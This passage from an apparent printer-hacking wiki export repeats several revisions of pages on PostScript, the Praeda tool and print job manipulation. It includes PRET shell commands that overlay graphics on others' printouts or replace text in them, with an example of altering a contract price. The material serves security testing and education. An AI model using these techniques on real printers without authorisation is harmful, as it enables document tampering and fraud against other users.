a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: %! (Hello world) print While most printer manufacturers have implemented (as hardware modules or in software) and licensed ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones – '''Br-Script''' and '''KPDL''' – which are not 100% compatible, especially concerning security features. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. → ''Related aricles:'' [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- 2d2ba07d6b74ece519a7edb284ab00f0017334f0 8 2016-11-22T09:53:02Z Admin 1 Created page with "Clones: Br-Script, KPDL" wikitext text/x-wiki Clones: Br-Script, KPDL 8be01f55cff41b126c1e85d82ebac8be50e46d32 0 2 97 96 2017-01-10T17:39:13Z 134.147.128.156 0 wikitext text/x-wiki Praeda is a ‘automated printer data harvesting tool’ written in Perl. It was developed to better understand the risks associated with multi-function printers, and to help penetration testers gather usable data during security assessment job. Praeda consists of several modules to exploit weaknesses in various printer models. Praeda systematically collects sensitive information from the printer's embedded web server. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the tool gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. == External links == * [http://h.foofus.net/?page_id=218 Official website] 0e2d5ebdc8d17dbe91348adf2fb9772e4a62914c 96 95 2017-01-10T17:38:09Z 134.147.128.156 0 wikitext text/x-wiki Praeda is a ‘automated printer data harvesting tool’ developed to better understand the risks associated with multi-function printers, and to help penetration testers gather usable data during security assessment job. Praeda consists of several modules to exploit weaknesses in various printer models. It systematically collects sensitive information from the printer's embedded web server. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the Perl program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. == External links == * [http://h.foofus.net/?page_id=218 Official website] 01aff51d9e8a7a67ef5d17abc09f0dc4271d37a1 95 3 2017-01-10T17:36:54Z 134.147.128.156 0 wikitext text/x-wiki Praeda is a ‘automated printer data harvesting tool’ developed to better understand the risks associated with multi-function printers, and to help penetration testers gather usable data during security assessment job. Praeda consists of several modules to exploit weaknesses in various printer models. It systematically collects sensitive information from the printer's embedded web server. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the tool gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. == External links == * [http://h.foofus.net/?page_id=218 Official website] 7dced45a959c0cf9959fe89791dcecf52a956c23 3 2016-11-22T09:17:00Z Admin 1 Created page with "http://h.foofus.net/?page_id=218" wikitext text/x-wiki http://h.foofus.net/?page_id=218 49a43bcdf8f0e49ac4711afd57f6fd6231727043 0 37 327 161 2017-01-31T15:36:35Z Admin 1 wikitext text/x-wiki The most valuable data found on printers is print jobs themselves. Even in a digital world, important documents are printed and kept as hard copies. In high security environments with encrypted hard disks and network traffic, printers might be the '''weakest link''' in the security chain. ''Currently, the following print job access categories are discussed in this wiki:'' * [[Print job retention]] – Obtaining documents printed by other users (the ultimate goal in printer hacking) * [[Print job manipulation]] – Editing documents printed by other users (overlay graphics and further pranks) 04a4a9bb3e79242c4649f08082b90e2eed2489bf 161 153 2017-01-15T17:26:14Z 92.227.58.56 0 wikitext text/x-wiki The most valuable data found on printers is print jobs themselves. Even in a digital world, important documents are printed and kept as hard copies. In high security environments with encrypted hard disks and network traffic, printers might be the weakest link in the security chain. ''Currently, the following print job access categories are discussed in this wiki:'' * [[Print job retention]] – Obtaining documents printed by other users (the ultimate goal in printer hacking) * [[Print job manipulation]] – Editing documents printed by other users (overlay graphics and further pranks) 08bb1bb97cbcf68d62cb530b07c6001dd3727b26 153 150 2017-01-15T16:38:07Z 92.227.58.56 0 wikitext text/x-wiki ''Currently, the following print job access categories are discussed in this wiki:'' * [[Print job retention]] – Obtaining documents printed by other users (the ultimate goal in printer hacking) * [[Print job manipulation]] – Editing documents printed by other users (overlay graphics and further pranks) dde3d64fdb9357b97e19975787b860959890e5f6 150 146 2017-01-15T16:35:56Z 92.227.58.56 0 wikitext text/x-wiki ''Currently, the following techniques to access print jobs are discussed in this wiki:'' * [[Print job retention]] – Obtaining documents printed by other users (the ultimate goal in printer hacking) * [[Print job manipulation]] – Editing documents printed by other users (overlay graphics and further pranks) 7a4fab8e7dad68e3880ffdc35b8f1fcfd79e9598 146 145 2017-01-15T16:28:26Z 92.227.58.56 0 wikitext text/x-wiki ''Currently, the following denial of service techniques are discussed in this wiki:'' * [[Print job retention]] – Obtaining documents printed by other users (the ultimate goal in printer hacking) * [[Print job manipulation]] – Editing documents printed by other users (overlay graphics and further pranks) b2d1cbd101568d6cef8af6d3c7452d4371aea153 145 2017-01-15T16:23:21Z 92.227.58.56 0 Created page with "''Currently, the following denial of service techniques are discussed in this wiki:'' * Print job retention]] – Obtaining documents printed by other users * Print job manip..." wikitext text/x-wiki ''Currently, the following denial of service techniques are discussed in this wiki:'' * Print job retention]] – Obtaining documents printed by other users * Print job manipulation]] – Editing documents printed by other users be8a9991fd610ab9f8a5c375cbe439de953c1f0f 0 47 323 215 2017-01-31T10:29:00Z 84.153.135.135 0 /* Content Replacement */ wikitext text/x-wiki If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging from the printer. The impact depends on the context of the print job and can range from simple pranks to serious business impairment. Two PostScript based techniques are discussed below. == Content Overlay == [[File:Overlay.jpg|thumb|Smiley overlay attack on others' jobs]] One simple way to manipulate the appearance of printouts is to use overlays. PCL has a documented function to put overlay macros on top of a document. Unfortunately, this feature is limited to the current print job and cannot be made permanent. PostScript does not offer such functionality by default, however it can be programmed into by [[PostScript#Operator redefinition|redefining]] the ''showpage'' operator which is contained in every PostScript document to print the current page. The attacker can hook in there, execute her own code and then call the original version of the operator. Therefore she can overlay all pages to be printed with a custom ''EPS'' file. This hack can be used to add arbitrary graphics or fonts to hard copies of a document. It is handy to play pranks like putting ‘hax0r slogans’ on all sheets – but also for legitimate tasks such as creating letterheads. Pranks range from occasional coffee stains on the sheets of a particular user to the simulation of a near empty toner cartridge. It is also possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content. For a more advanced attack, imagine the victim wants to sell a good to the attacker. Both parties agree on a price and receive a digital copy of the sales agreement. As the attacker knows the exact location of the price in the document, by manipulating the victim's printer she can add a blank rectangle here, including a lower price. If the printout is not re-checked before the contract is signed, the victim might need a good lawyer. This attack works even if the contract document was digitally signed and verified by a print server, because the file itself remains untouched. Obviously, such an approach can only be successful if PostScript is used as printer driver and no ''StartJobPassword'' (see [[credential disclosure]]) is set. '''How to test for this attack?''' Use [[PRET]]'s ''cross'' or ''overlay'' commands in ''ps'' mode, then disconnect and print an arbitrary document: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> overlay overlays/smiley.eps printer:/> cross whoa "HACKED" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Content Replacement == Even if an attacker can put an overlay above existing documents, she will not be able to alter specific values in the original document unless its exact structure is known. Sometimes ones does not only want to add custom content, but to parse and replace parts of the existing document. Especially replacing text seems to be an attractive function, introducing new possibilities to the attacker as she can go for targeted manipulation or randomly transpose digits and introduce misspellings. The problem of replacing text in PostScript files can be reduced to the problem of extracting strings from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option. This issue has been discussed by <ref name="nevill1997extracting">''[https://pdfs.semanticscholar.org/494d/24a72be788a91a6ca45373c2d33013f33395.pdf Extracting Text from PostScript]'', C. Nevill-Manning, T. Reed and others, 1997</ref>. They use a PostScript interpreter with a redefined ''show'' operator to index documents for the New Zealand Digital Library Project (NZDLP). The ''show'' operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, text can elegantly be extracted. This approach can also be used for targeted searching and replacing in strings immediately before they are painted. While this scheme sounds good in theory and was ‘surprisingly effective on the 40,000 technical reports’ <ref name="nevill1997extracting"/> of the NZDLP, it depends on the PostScript code quality generated either directly by an application or by a printing system like CUPS. For example, the approach is successful for ''LaTeX'' based PostScript documents which are directly sent to the printer while it fails for PostScript files generated by ''GIMP'' <ref>''[https://www.gimp.org/ GIMP – GNU Image Manipulation Program]'', S. Kimball and P. Mattis</ref> which instead of strings creates raster graphics of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. Theoretically such language constructs could also be parsed and should be subject of further research. '''How to test for this attack?''' Use [[PRET]]'s ''replace'' command in ''ps'' mode, then disconnect and print a PostScript document containing ‘DEF’: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> replace "ABC" "DEF" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 7c5739c5605bf09eaa29987cb37307fecb062f9a 215 214 2017-01-23T17:51:27Z Admin 1 wikitext text/x-wiki If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging from the printer. The impact depends on the context of the print job and can range from simple pranks to serious business impairment. Two PostScript based techniques are discussed below. == Content Overlay == [[File:Overlay.jpg|thumb|Smiley overlay attack on others' jobs]] One simple way to manipulate the appearance of printouts is to use overlays. PCL has a documented function to put overlay macros on top of a document. Unfortunately, this feature is limited to the current print job and cannot be made permanent. PostScript does not offer such functionality by default, however it can be programmed into by [[PostScript#Operator redefinition|redefining]] the ''showpage'' operator which is contained in every PostScript document to print the current page. The attacker can hook in there, execute her own code and then call the original version of the operator. Therefore she can overlay all pages to be printed with a custom ''EPS'' file. This hack can be used to add arbitrary graphics or fonts to hard copies of a document. It is handy to play pranks like putting ‘hax0r slogans’ on all sheets – but also for legitimate tasks such as creating letterheads. Pranks range from occasional coffee stains on the sheets of a particular user to the simulation of a near empty toner cartridge. It is also possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content. For a more advanced attack, imagine the victim wants to sell a good to the attacker. Both parties agree on a price and receive a digital copy of the sales agreement. As the attacker knows the exact location of the price in the document, by manipulating the victim's printer she can add a blank rectangle here, including a lower price. If the printout is not re-checked before the contract is signed, the victim might need a good lawyer. This attack works even if the contract document was digitally signed and verified by a print server, because the file itself remains untouched. Obviously, such an approach can only be successful if PostScript is used as printer driver and no ''StartJobPassword'' (see [[credential disclosure]]) is set. '''How to test for this attack?''' Use [[PRET]]'s ''cross'' or ''overlay'' commands in ''ps'' mode, then disconnect and print an arbitrary document: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> overlay overlays/smiley.eps printer:/> cross whoa "HACKED" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Content Replacement == Even if an attacker can put an overlay above existing documents, she will not be able to alter specific values in the original document unless its exact structure is known. Sometimes ones does not only want to add custom content, but to parse and replace parts of the existing document. Especially replacing text seems to be an attractive function, introducing new possibilities to the attacker as she can go for targeted manipulation or randomly transpose digits and introduce misspellings. The problem of replacing text in PostScript files can be reduced to the problem of extracting strings from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option. This issue has been discussed by <ref name="nevill1997extracting">''[https://pdfs.semanticscholar.org/494d/24a72be788a91a6ca45373c2d33013f33395.pdf Extracting Text from PostScript]'', C. Nevill-Manning, T. Reed and others, 1997</ref>. They use a PostScript interpreter with a redefined ''show'' operator to index documents for the New Zealand Digital Library Project (NZDLP). The ''show'' operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, text can elegantly be extracted. This approach can also be used for targeted searching and replacing in strings immediately before they are painted. While this scheme sounds good in theory and was ‘surprisingly effective on the 40,000 technical reports’ <ref name="nevill1997extracting"/> of the NZDLP, it depends on the PostScript code quality generated either directly by an application or by a printing system like CUPS. For example, the approach is successful for ''LaTeX'' based PostScript documents which are directly send to the printer while it fails for PostScript files generated by ''GIMP'' <ref>''[https://www.gimp.org/ GIMP – GNU Image Manipulation Program]'', S. Kimball and P. Mattis</ref> which instead of strings creates raster graphics of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. Theoretically such language constructs could also be parsed and should be subject of further research. '''How to test for this attack?''' Use [[PRET]]'s ''replace'' command in ''ps'' mode, then disconnect and print a PostScript document containing ‘DEF’: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> replace "ABC" "DEF" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 30e94d42d6346d2e2bebcd58d495c326b6e61ecf 214 213 2017-01-23T17:21:29Z Admin 1 wikitext text/x-wiki If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging from the printer. The impact depends on the context of the print job and can range from simple pranks to serious business impairment. Two PostScript based techniques are discussed below. == Content Overlay == [[File:Overlay.jpg|thumb|Smiley overlay attack on others' jobs]] One simple way to manipulate the appearance of printouts is to use overlays. PCL has a documented function to put overlay macros on top of a document. Unfortunately, this feature is limited to the current print job and cannot be made permanent. PostScript does not offer such functionality by default, however it can be programmed into by [[PostScript#Operator redefinition|redefining]] the ''showpage'' operator which is contained in every PostScript document to print the current page. The attacker can hook in there, execute her own code and then call the original version of the operator. Therefore she can overlay all pages to be printed with a custom ''EPS'' file. This hack can be used to add arbitrary graphics or fonts to hard copies of a document. It is handy to play pranks like putting `hax0r slogans` on all sheets – but also for legitimate tasks such as creating letterheads. Pranks range from occasional coffee stains on the sheets of a particular user to the simulation of a near empty toner cartridge. It is also possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content. For a more advanced attack, imagine the victim wants to sell a good to the attacker. Both parties agree on a price and receive a digital copy of the sales agreement. As the attacker knows the exact location of the price in the document, by manipulating the victim's printer she can add a blank rectangle here, including a lower price. If the printout is not re-checked before the contract is signed, the victim might need a good lawyer. This attack works even if the contract document was digitally signed and verified by a print server, because the file itself remains untouched. Obviously, such an approach can only be successful if PostScript is used as printer driver and no ''StartJobPassword'' (see [[credential disclosure]]) is set. '''How to test for this attack?''' Use [[PRET]]'s ''cross'' or ''overlay'' commands in ''ps'' mode, then disconnect and print an arbitrary document: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> overlay overlays/smiley.eps printer:/> cross whoa "HACKED" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Content Replacement == Even if an attacker can put an overlay above existing documents, she will not be able to alter specific values in the original document unless its exact structure is known. Sometimes ones does not only want to add custom content, but to parse and replace parts of the existing document. Especially replacing text seems to be an attractive function, introducing new possibilities to the attacker as she can go for targeted manipulation or randomly transpose digits and introduce misspellings. The problem of replacing text in PostScript files can be reduced to the problem of extracting strings from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option. This issue has been discussed by <ref name="nevill1997extracting">''[https://pdfs.semanticscholar.org/494d/24a72be788a91a6ca45373c2d33013f33395.pdf Extracting Text from PostScript]'', C. Nevill-Manning, T. Reed and others, 1997</ref>. They use a PostScript interpreter with a redefined ''show'' operator to index documents for the New Zealand Digital Library Project (NZDLP). The ''show'' operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, text can elegantly be extracted. This approach can also be used for targeted searching and replacing in strings immediately before they are painted. While this scheme sounds good in theory and was 'surprisingly effective on the 40,000 technical reports` <ref name="nevill1997extracting"/> of the NZDLP, it depends on the PostScript code quality generated either directly by an application or by a printing system like CUPS. For example, the approach is successful for ''LaTeX'' based PostScript documents which are directly send to the printer while it fails for PostScript files generated by ''GIMP'' <ref>''[https://www.gimp.org/ GIMP – GNU Image Manipulation Program]'', S. Kimball and P. Mattis</ref> which instead of strings creates raster graphics of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. Theoretically such language constructs could also be parsed and should be subject of further research. '''How to test for this attack?''' Use [[PRET]]'s ''replace'' command in ''ps'' mode, then disconnect and print a PostScript document containing ‘DEF’: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> replace "ABC" "DEF" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 3b45118b545ede42be0d88c94f17687e7e30bc75 213 211 2017-01-23T17:17:34Z Admin 1 wikitext text/x-wiki If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging from the printer. The impact depends on the context of the print job and can range from simple pranks to serious business impairment. Two PostScript based techniques are discussed below. == Content Overlay == [[File:Overlay.jpg|thumb|Smiley overlay attack on others' jobs]] One simple way to manipulate the appearance of printouts is to use overlays. PCL has a documented function to put overlay macros on top of a document. Unfortunately, this feature is limited to the current print job and cannot be made permanent. PostScript does not offer such functionality by default, however it can be programmed into by [[PostScript#Operator redefinition|redefining]] the ''showpage'' operator which is contained in every PostScript document to print the current page. The attacker can hook in there, execute her own code and then call the original version of the operator. Therefore she can overlay all pages to be printed with a custom ''EPS'' file. This hack can be used to add arbitrary graphics or fonts to hard copies of a document. It is handy to play pranks like putting `hax0r slogans` on all sheets – but also for legitimate tasks such as creating letterheads. Pranks range from occasional coffee stains on the sheets of a particular user to the simulation of a near empty toner cartridge. It is also possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content. For a more advanced attack, imagine the victim wants to sell a good to the attacker. Both parties agree on a price and receive a digital copy of the sales agreement. As the attacker knows the exact location of the price in the document, by manipulating the victim's printer she can add a blank rectangle here, including a lower price. If the printout is not re-checked before the contract is signed, the victim might need a good lawyer. This attack works even if the contract document was digitally signed and verified by a print server, because the file itself remains untouched. Obviously, such an approach can only be successful if PostScript is used as printer driver and no ''StartJobPassword'' (see [[credential disclosure]]) is set. '''How to test for this attack?''' Use [[PRET]]'s ''cross'' or ''overlay'' commands in ''ps'' mode, then disconnect and print an arbitrary document: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> overlay overlays/smiley.eps printer:/> cross whoa "HACKED" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Content Replacement == Even if an attacker can put an overlay above existing documents, she will not be able to alter specific values in the original document unless its exact structure is known. Sometimes ones does not only want to add custom content, but to parse and replace parts of the existing document. Especially replacing text seems to be an attractive function, introducing new possibilities to the attacker as she can go for targeted manipulation or randomly transpose digits and introduce misspellings. The problem of replacing text in PostScript files can be reduced to the problem of extracting strings from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option. This issue has been discussed by <ref name="nevill1997extracting">''[https://pdfs.semanticscholar.org/494d/24a72be788a91a6ca45373c2d33013f33395.pdf Extracting Text from PostScript]'', C. Nevill-Manning, T. Reed and others, 1997</ref>. They use a PostScript interpreter with a redefined ''show'' operator to index documents for the New Zealand Digital Library Project (NZDLP). The ''show'' operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, text can elegantly be extracted. This approach can also be used for targeted searching and replacing in strings immediately before they are painted. While this scheme sounds good in theory and was 'surprisingly effective on the 40,000 technical reports` <ref name="nevill1997extracting"/> of the NZDLP, it depends on the PostScript code quality generated either directly by an application or by a printing system like CUPS. For example, the approach is successful for ''LaTeX'' based PostScript documents which are directly send to the printer while it fails for PostScript files generated by ''GIMP'' <ref>''[https://www.gimp.org/ GIMP – GNU Image Manipulation Program]'', S. Kimball and P. Mattis</ref> which instead of strings creates raster graphics of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. Theoretically such language constructs could also be parsed, this would however go beyond the scope of this work. '''How to test for this attack?''' Use [[PRET]]'s ''replace'' command in ''ps'' mode, then disconnect and print a PostScript document containing ‘DEF’: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> replace "ABC" "DEF" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- ee0ea5e94a23a94d2882a91f393c90c77a75f661 211 210 2017-01-23T17:06:32Z Admin 1 wikitext text/x-wiki If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging from the printer. The impact depends on the context of the print job and can range from simple pranks to serious business impairment. Two PostScript based techniques are discussed below. == Content Overlay == One simple way to manipulate the appearance of printouts is to use overlays. PCL has a documented function to put overlay macros on top of a document. Unfortunately, this feature is limited to the current print job and cannot be made permanent. PostScript does not offer such functionality by default, however it can be programmed into by [[PostScript#Operator redefinition|redefining]] the ''showpage'' operator which is contained in every PostScript document to print the current page. The attacker can hook in there, execute her own code and then call the original version of the operator. Therefore she can overlay all pages to be printed with a custom ''EPS'' file. This hack can be used to add arbitrary graphics or fonts to hard copies of a document. It is handy to play pranks like putting `hax0r slogans` on all sheets – but also for legitimate tasks such as creating letterheads. Pranks range from occasional coffee stains on the sheets of a particular user to the simulation of a near empty toner cartridge. It is also possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content. For a more advanced attack, imagine the victim wants to sell a good to the attacker. Both parties agree on a price and receive a digital copy of the sales agreement. As the attacker knows the exact location of the price in the document, by manipulating the victim's printer she can add a blank rectangle here, including a lower price. If the printout is not re-checked before the contract is signed, the victim might need a good lawyer. This attack works even if the contract document was digitally signed and verified by a print server, because the file itself remains untouched. Obviously, such an approach can only be successful if PostScript is used as printer driver and no ''StartJobPassword'' (see [[credential disclosure]]) is set. '''How to test for this attack?''' Use [[PRET]]'s ''cross'' or ''overlay'' commands in ''ps'' mode, then disconnect and print an arbitrary document: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> overlay overlays/smiley.eps printer:/> cross whoa "HACKED" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Content Replacement == Even if an attacker can put an overlay above existing documents, she will not be able to alter specific values in the original document unless its exact structure is known. Sometimes ones does not only want to add custom content, but to parse and replace parts of the existing document. Especially replacing text seems to be an attractive function, introducing new possibilities to the attacker as she can go for targeted manipulation or randomly transpose digits and introduce misspellings. The problem of replacing text in PostScript files can be reduced to the problem of extracting strings from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option. This issue has been discussed by <ref name="nevill1997extracting">''[https://pdfs.semanticscholar.org/494d/24a72be788a91a6ca45373c2d33013f33395.pdf Extracting Text from PostScript]'', C. Nevill-Manning, T. Reed and others, 1997</ref>. They use a PostScript interpreter with a redefined ''show'' operator to index documents for the New Zealand Digital Library Project (NZDLP). The ''show'' operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, text can elegantly be extracted. This approach can also be used for targeted searching and replacing in strings immediately before they are painted. While this scheme sounds good in theory and was 'surprisingly effective on the 40,000 technical reports` <ref name="nevill1997extracting"/> of the NZDLP, it depends on the PostScript code quality generated either directly by an application or by a printing system like CUPS. For example, the approach is successful for ''LaTeX'' based PostScript documents which are directly send to the printer while it fails for PostScript files generated by ''GIMP'' <ref>''[https://www.gimp.org/ GIMP – GNU Image Manipulation Program]'', S. Kimball and P. Mattis</ref> which instead of strings creates raster graphics of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. Theoretically such language constructs could also be parsed, this would however go beyond the scope of this work. '''How to test for this attack?''' Use [[PRET]]'s ''replace'' command in ''ps'' mode, then disconnect and print a PostScript document containing ‘DEF’: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> replace "ABC" "DEF" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- ddddeadc9da7c8efff8929635d9a65798be63510 210 2017-01-23T17:05:25Z Admin 1 Created page with "If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging f..." wikitext text/x-wiki If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging from the printer. The impact depends on the context of the print job and can range from simple pranks to serious business impairment. Two PostScript based techniques are discussed below. == Content Overlay == One simple way to manipulate the appearance of printouts is to use overlays. PCL has a documented function to put overlay macros on top of a document. Unfortunately, this feature is limited to the current print job and cannot be made permanent. PostScript does not offer such functionality by default, however it can be programmed into by [[PostScript#Operator redefinition|redefining]] the ''showpage'' operator which is contained in every PostScript document to print the current page. The attacker can hook in there, execute her own code and then call the original version of the operator. Therefore she can overlay all pages to be printed with a custom ''EPS'' file. This hack can be used to add arbitrary graphics or fonts to hard copies of a document. It is handy to play pranks like putting `hax0r slogans` on all sheets – but also for legitimate tasks such as creating letterheads. Pranks range from occasional coffee stains on the sheets of a particular user to the simulation of a near empty toner cartridge. It is also possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content. For a more advanced attack, imagine the victim wants to sell a good to the attacker. Both parties agree on a price and receive a digital copy of the sales agreement. As the attacker knows the exact location of the price in the document, by manipulating the victim's printer she can add a blank rectangle here, including a lower price. If the printout is not re-checked before the contract is signed, the victim might need a good lawyer. This attack works even if the contract document was digitally signed and verified by a print server, because the file itself remains untouched. Obviously, such an approach can only be successful if PostScript is used as printer driver and no ''StartJobPassword'' (see [[credential disclosure]]) is set. '''How to test for this attack?''' Use [[PRET]]'s ''cross'' or ''overlay'' commands in ''ps'' mode, then disconnect and print an arbitrary document: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> overlay overlays/smiley.eps printer:/> cross whoa "HACKED" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Content Replacement == Even if an attacker can put an overlay above existing documents, she will not be able to alter specific values in the original document unless its exact structure is known. Sometimes we do not only want to add custom content, but to parse and replace parts of the existing document. Especially replacing text seems to be an attractive function, introducing new possibilities to the attacker as she can go for targeted manipulation or randomly transpose digits and introduce misspellings. The problem of replacing text in PostScript files can be reduced to the problem of extracting strings from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option. This issue has been discussed by <ref name="nevill1997extracting">''[https://pdfs.semanticscholar.org/494d/24a72be788a91a6ca45373c2d33013f33395.pdf Extracting Text from PostScript]'', C. Nevill-Manning, T. Reed and others, 1997</ref>. They use a PostScript interpreter with a redefined ''show'' operator to index documents for the New Zealand Digital Library Project (NZDLP). The ''show'' operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, text can elegantly be extracted. We use this approach for targeted searching and replacing in strings immediately before they are painted. While this scheme sounds good in theory and was 'surprisingly effective on the 40,000 technical reports` <ref name="nevill1997extracting"/> of the NZDLP, it depends on the PostScript code quality generated either directly by an application or by a printing system like CUPS. For example, the approach is successful for ''LaTeX'' based PostScript documents which are directly send to the printer while it fails for PostScript files generated by ''GIMP'' <ref>''[https://www.gimp.org/ GIMP – GNU Image Manipulation Program]'', S. Kimball and P. Mattis</ref> which instead of strings creates raster graphics of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. Theoretically such language constructs could also be parsed, this would however go beyond the scope of this work. '''How to test for this attack?''' Use [[PRET]]'s ''replace'' command in ''ps'' mode, then disconnect and print a PostScript document containing ‘DEF’: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> replace "ABC" "DEF" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- d6b61e8e5cdbe484dc7bdfe436603bfc903bec94 0 54 290 288 2017-01-29T18:43:52Z 77.182.55.117 0 /* PostScript */ wikitext text/x-wiki The most valuable data found on printers is print jobs themselves. Even in a digital world, important documents are printed and kept as hard copies. In high security environments with encrypted hard disks and network traffic, printers might be the weakest link in the security chain. However, even with access to the file system of a printer device an attacker cannot retrieve print jobs unless they have explicitly been stored. This is because print jobs are processed on-the-fly in memory only and never touch the hard disk. This article discusses legitimate print job retention features and methods to actively capture documents to being printed. == Job Retention == Some printers have stored print jobs accessible from the web server (for example, the ''HP DesignJet Z6100ps''). Usually however, job retention must be explicitly activated for a certain print job which can be done using standard PJL commands or proprietary PostScript code. Jobs are then kept in memory and can be reprinted from the control panel. === PJL === Legitimate job retention can be enabled for the current document by setting the PJL ''HOLD'' variable <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, 